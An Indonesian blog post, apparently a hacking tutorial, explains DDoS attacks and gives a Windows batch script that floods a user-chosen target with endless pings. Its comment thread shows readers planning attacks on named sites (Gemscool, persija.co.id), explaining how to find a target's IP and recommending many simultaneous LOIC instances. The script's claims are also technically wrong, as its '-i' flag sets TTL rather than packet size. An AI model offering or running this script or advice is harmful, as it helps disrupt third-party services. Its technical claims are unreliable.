Join Us !!

Headline サイバー

Label サイバー

بِسْــــــــــــــــمِ اﷲِالرَّحْمَنِ اارَّحِيم

DDoS attack adalah Distributed-Denial-of-Service attack, sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system atau bisa di bilang dengan zombie komputer yang ‘menyerang’ secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-lamanya. DDoS attack adalah salah satu model dari DoS ( denial-of-service) attack.
Target serangan DoS attack bisa ditujukan ke berbagai bagian jaringan. Bisa ke routing devices, web, electronic mail, atau server Domain Name System cara menggunakan DDoS Attack menggunakan CMD
Mungkin udah banyak yang tau trick ini, gk ada salahnya saya share ulang. skalian buat simpan file saya, udah penuh Flashdisk saya....
Cara termasuk mudah, anak SD pun juga bisa kok.. Dan satu lagi ini hanya work pada win7, sudah saya coba pada win xp hasilnya tdk berfungsi. Alias file DDoS ini tdk terbuka saat mau dijalankan.

     Cara Pemakaian :
  • Copy script dibawah ini dan paste di notepad, Simpan dengan file exstensinya (.bat) tanpa tanda kurung. Misal DDOS.bat
@echo off

mode 67,16

title DDOS Attack By H-Des

color 0b

cls

echo.

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

echo DDOS With Batchfile By H-Des

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

echo.

set /p x=Server-Target:

echo.

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

ping %x%

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

@ping.exe 127.0.0.1 -n 5 -w 1000 > nul

goto Next

:Next

echo.

echo.

echo.

set /p m=ip Host:

echo.

set /p n=Packet Size:

echo.

:DDOS

color 0d

echo Attacking Server %m%

ping %m% -i %n% -t >nul

goto DDOS

  • Trus buka file tersebut dan masukan target, tekan Enter
  • Masukkan ip-host target, tekan Enter lagi
  • Akan muncul Packet Size, dan masukkan sesukamu, Misal 100000 atau 1000000, Tekan Enter 


Dia akan Attacking ip yang kita Ddos tadi. Good Luck

{ 26 komentar... read them below or Comment }

  1. Info bagus gan !!!
    gw mau attack IP Gemscool !!

    BalasHapus
  2. Makasih tutornya gan, pertamax

    BalasHapus
  3. cara ngetahui IP host gmn gan maaf newbie

    BalasHapus
    Balasan
    1. crnya masuk CMD ping www.target.com enter

      Hapus
  4. gan
    ane udah ber jam jam
    server nya ga down down

    BalasHapus
    Balasan
    1. Kl sndiri bsa 7 hri broo.... kl rame2 cpet down.... 300 org apa brapa biar cpet down situs target.... ^_^

      Hapus
    2. Jadi 7 harian gak di matikan ini program nya gan

      Hapus
  5. klo udah sukses gmna gan tampilan nya?

    BalasHapus
  6. bos gemscoll gamungkin kena . butuh banyak kompi untuk jatuhinnya . laghian juga pasti pake anti ddos

    BalasHapus
  7. emang nya nggak ada alat Ddos lain yang gampang ngedown nin Website Bro

    BalasHapus
  8. kalo mau tau ip web yang kalian mau DDOS,buka CMD dan ketik "ping (alamat website target).com/co.id" (tanpa kutip)

    BalasHapus
    Balasan
    1. contohh ping www.persija.co.id nanti juga bakal keluar ip nya

      Hapus
  9. koq gk work -_-

    BalasHapus
  10. maaf saya newbie yg di maksud CMD itu apa iya

    BalasHapus
  11. Balasan
    1. bisa sendiri tapi lama mungkin butuh waktu 5 hari atau lebih, tapi terserah sih kalo mau cepet ya rame rame atau ajak teman teman kamu. kalo di warnet ajak aja teman teman kamu buat bikin down server target :)
      maaf kalo salah ya soalnya gue juga newbie

      Hapus
  12. Cara Menemukan IP Gmna Gan ???

    BalasHapus
  13. kok file ".bat" nya gak berubah gan..? :(
    masih terbaca file "txt"

    BalasHapus
  14. misalnya ane dah serang
    kemudian ada tulisan "ip host"
    kok gak ada gan

    BalasHapus
  15. pake loic aja .. jalan kan 10 atau 50 software loic lalujalan juga ddos via cwm .. 1 jam bakal hancur ni blog

    BalasHapus
  16. cara punya ddos nya gimana ?

    BalasHapus
  17. kok filenya masih txt ? cara jdiin ke bat gmna ? blum tau apa2 nih :/

    BalasHapus